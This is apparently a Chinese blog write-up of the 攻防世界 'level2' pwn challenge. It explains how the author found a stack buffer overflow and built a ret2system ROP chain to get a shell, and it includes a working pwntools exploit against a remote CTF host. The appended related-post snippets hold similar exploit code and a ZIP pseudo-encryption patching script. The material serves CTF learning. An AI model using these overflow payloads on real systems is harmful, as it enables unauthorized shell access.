攻防世界_level2

原创 已于 2022-04-11 08:41:13 修改 · 4.4k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #python

于 2022-04-10 14:17:54 首次发布

checksec

在这里插入图片描述
checksec后发现开了NX,这就意味着栈中数据没有执行权限,但是可以利用rop这种方法绕过。最近再看蒸米大神的教程
一步一步学 ROP 之 Linux_x86 篇
一步一步学ROP之linux_x64篇

IDA

在这里插入图片描述
在这里插入图片描述

ida发现有个system函数,并在字符串窗口发现bin/sh
虽然学了linux,但还是不大明白这个,搜了一下Shell 教程。echo"Hello World!“就是一个最简单的shell脚本例子,”#!"是约定的标记,后面加所用的shell环境,这里是Bourne Shell(/usr/bin/sh或/bin/sh),实际Bourne Again Shell(/bin/bash)是最常用的。
在这里插入图片描述
找到ststem函数所在地址,_system 0x08048320
并非system 0x0804A038,从main函数直接跳转不会搞错
在这里插入图片描述
"bin/sh"字符串所在地址,0x0804A024
在这里插入图片描述
缓冲区0x88,允许读入0x100,存在缓冲区溢出。

exp

原来这个过程叫“构造rop链”,rop链攻击原理与思路(x86/x64)这个是20年的,算是比较新,没开始细看,大体还不错。
payload组成,参考攻防世界-iyzyi的wp,wp-上传者-iyzy
payload组成: 0x88个缓冲区字符,0x04个覆盖ebp地址的字符,覆写返回地址为system函数(system的栈帧中的ebp),p32(0)填充ebp+4,p32(bin_sh)自然就是system的参数(ebp+8)喽

from pwn import *

p = remote('111.200.241.244',58154)
#  0x88+0x04=0x8c  "bin/sh":0x0804A024  _system:0x08048320
payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024)
p.recvuntil("Input:")
p.send(payload)
p.interactive()

0x8c: 0x88+0x04=0x8c(十六进制),这个0x04是从vulnerable_function中的参数buf得来
p32,p64啥意思?
pwn从入门到放弃第四章——pwntools的基本使用教程pwntools还是要好好学学。
p32 p64:将一个数字转换为字符
u32 u64:将字符转换为数字
或者说p32、p64是打包为二进制,u32、u64是解包为二进制Pwn基础知识笔记
这里的p32是因为程序是32位的,p32(0)是因为_system的r也是要填上的(下面详细解释)
在这里插入图片描述
双击buf可以看到
在这里插入图片描述
拉到底,这里与level0中是相同的,r 是返回的地址,s是保存的寄存器
我的理解是 因为它存在溢出,先将栈填满,再把寄存器填满(这里寄存器就是ebp,eax也是一个寄存器,暂存ebp和buf的地址,然后push进栈)我们通过让这个栈满了
在这里插入图片描述
又因为函数返回要用 r,给 r 赋上咱们想让它到的地方的地址,这里让它返回到_system函数,
在这里插入图片描述
_system函数的 r 也是这样,不过这里的是0,也就是没有要返回的地址,p32(0)可以填充四位,到下面的command 运行shell “bin/sh” ,这样就可以拿到flag
在这里插入图片描述

flag

ls:列出文件和文件夹
cat:显示文件内容
linux基础: Linux基础入门(详细版)
在这里插入图片描述

攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1672
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
攻防世界 level2
10-04 487
1.题目 2.IDA分析 3.流程分析 流程很简单,输入信息,输出hello world。read函数也存在明显的溢出点。问题是没有找到现成可用的函数cat flag或者调用system函数。因此,只能我们自己构造。 如上图 我们可以获取到system和‘/bin/sh’的地址(注意,/bin/sh在.data段,如果是.rdata段则不能利用,原因还没有找到,可能是因为rdata只读不能执行?知道的读者麻烦评论告知一下~),exp如下: from pwn import...
攻防世界level2
weixin_43489686的博客
03-30 362
我这种菜鸡就打打这种签到题刷刷存在感吧。。。 32位,基本没啥保护 简单溢出 system函数地址和/bin/sh地址都有了 直接上exp from pwn import * p = remote('111.198.29.45',55216) bin_sh = 0x804A024 system = 0x8048320 payload = 'a'*0x88+'a'*4+p32(syst...
BUU刷题-Pwn-level2攻防世界有)
一个啥也不会的小菜鸡!
08-10 199
[攻防世界-Pwn-level2]]
攻防世界-level2
qq_45771413的博客
04-22 399
查看保护 IDA分析 在vulnerable_function里找到了读取溢出: 字符串长度136,读取长度256,读多了。 这里看到了system,以为可以获取shell,结果发现就是个普通的输出字符串……(菜) 寻找敏感权限: 直接查找字符串找到了 system /bin/sh 但是他俩不在一块儿。第一次直接拼接/bin/sh失败 后面尝试在填充buf和ebp后缝合system和/bin/sh,但是一直不成功。 尝试了两个system的内存地址也是如此…… 上网看别人wp,发现真正调用sy
[攻防世界]level2
逆向萌新的博客
05-31 286
[攻防世界]level2
攻防世界level2[WriteUP]
如有错误感谢斧正
04-14 422
用checksec、file命令查看文件属性与防护32位小端序二进制文件。
攻防世界 - Misc - Level 2 - funny-video
12-14
本题的考察的是 MISC 中的音频隐写,要想过此关,你需要知道以下知识点: - 使用 MKVToolNix 查看非默认声道并导出。(`xxx.mp3`) - 使用 Audacity 查看音频的 “频谱图”。
攻防世界 - Misc - Level 2 - Hear-with-your-Eyes
12-13
在现代网络安全领域,攻防世界Misc级别的挑战题目通常旨在引导参与者学习如何通过不同的手法和技术手段来解决特定的问题。在这个题目“Hear-with-your-Eyes”中,我们被引导去深入探索音频隐写术。音频隐写术是一种...
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
攻防世界 - Web - Level 1 file_include
m0_74824687的博客
12-26 764
本题考察的是 PHP 的文件包含漏洞,一般 CTF 的文件包含漏洞考点都是 PHP 伪协议。文件中的,当然不乏改名的。我们在进行文件包含之前,先定位一下 Flag 文件的位置(这里可以使用工具扫,但笔者觉得没必要)。首先请求上面的 Payload 模板,并使用 BurpSuite 进行抓包,然后将 PHP 支持的字符编码作为参数替换。估计是对用户传入值进行一个检查的文件,然后就是直接进行文件包含了。的话,内容肯定会和我们直接访问一样,显示为空,所以我们需要对。下面我们就是尝试进行文件包含,直接包含。
攻防世界和jarvis oj的level2
CNXBDSa的博客
07-27 482
PS:两者题型完全一样 就不过多解释了!!!!!!!! 首先第一步是运行这个程序看程序是什么 然后使用checksec去查看这个的保护机制和位数 详情请去看大佬总结比较详细 然后放入对应的iDA中查看 ...
攻防世界 level2
@一个努力学编程的网安小可爱的博客
01-21 2772
攻防世界 level2 优秀题解 exp 脚本 from pwn import* #p=remote("111.200.241.244",58836) p=process("./21") payload=('a'*0x8c).encode()+p32(0x0804845C)+p32(0x0804A024).encode() #payload='a'*(0x8c)+p32(0x804A038)+p32(0)+p32(0x804A024).decode('unicode_escape') p.sendl
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2505
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
【愚公系列】2022年01月 攻防世界-简单题-PWN-002(level2)
热门推荐
时光隧道
01-18 3万+
文章目录一、level2二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level2 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level2 checksec --file=level2 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界 Pwn level2
MrTreebook的博客
07-16 611
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
攻防世界PWN-level2
Deeeelete的博客
11-13 1133
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界fakezip
最新发布
04-30
### CTF 攻防世界 FakeZIP 挑战解题思路 #### 背景介绍 在 CTF 的杂项(Miscellaneous, MISC)类别中,`FakeZIP` 是一种常见的挑战形式。这类题目通常涉及分析带有伪加密标志的 ZIP 文件,并通过修改其十六进制编码来绕过所谓的“加密”。以下是针对 `攻防世界 - Misc - Level 1 | fakezip` 挑战的具体解题方法。 --- #### 技术背景与原理 ZIP 文件中的伪加密是一种特殊的标记机制,在文件头部分存在特定字段用于指示该文件是否被加密。然而,这种加密并非真正的数据保护手段,而仅仅是设置了某些位标志。如果这些标志被手动清除,则可以绕过密码验证过程直接访问文件内容[^2]。 具体来说: - **关键字段**:ZIP 文件头部结构中有几个重要的字节序列决定了文件的行为。 - **标志位作用**:当某个标志位设置为表示“已加密”的状态时,即使实际未执行任何加解密操作,程序仍会提示输入密码才能继续读取文件内容。 因此,解决此类问题的核心在于找到并更改这些控制行为的关键字节。 --- #### 工具准备 完成此任务需要用到以下工具之一来进行二进制编辑: - HxD (推荐初学者使用) - WinHex - 010 Editor 以上软件均支持直观显示文件内部原始数据流以及方便快捷地定位感兴趣区域进行修改。 --- #### 实际步骤解析 假设已经获取到了名为 `fake.zip` 的目标压缩包: 1. 使用任意一款前述提到的支持十六进制视图模式的应用加载待处理的目标档案; 2. 查找特征字符串 `50 4B 03 04`, 这代表标准本地文件头签名(Local File Header Signature)[^2]; 3. 定位到紧随上述签名字样之后的部分——即偏移量固定的位置处寻找可能存在的所谓‘加密’标签; 4. 修改相应位置上的数值由原本表明启用状态(`01`)改为关闭状态(`00`); 5. 对整个文档实施全局搜索确认是否存在其他相似情况重复上述动作直至全部调整完毕; 6. 存盘退出重新尝试开启原先受阻塞的资源应该能够顺利浏览其中所含项目无需再提供额外凭证信息. 7. 找到最终隐藏的信息片段比如图片等形式承载的有效负载提取出来解读得到预期的结果如FLAG串等。 ```python # 示例代码展示如何利用Python脚本批量替换指定字节值(仅作演示用途) def modify_zip(file_path): with open(file_path,"rb+") as f: data=f.read() # 寻找所有匹配'50 4B 03 04' index=0 while True: pos=data.find(b'\x50\x4b\x03\x04',index) if pos==-1:break enc_flag_pos=pos+6 # 加密旗标位于第7个字节 current_byte=data[enc_flag_pos] if(current_byte & 0x01)==0x01:# 如果最低有效位设定了则清零它 new_data=list(data) new_data[enc_flag_pos]&=~0x01 data=bytes(new_data) index+=len(b'\x50\x4b\x03\x04') with open(file_path,'wb')as wf: wf.write(data) if __name__=='__main__': import sys try: file=sys.argv[1] modify_zip(file) print(f"{file} has been modified successfully.") except Exception as e: print(e) ``` --- #### 结果验证 按照上述流程完成后,应能无障碍打开之前声称需密码解锁的那个假加密ZIP档,并从中取得埋藏好的线索资料例如图像之类的东西进而发掘出最后的答案格式形同于先前例子给出的标准样式:`flag{...}`[^1]. ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_JINJI_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值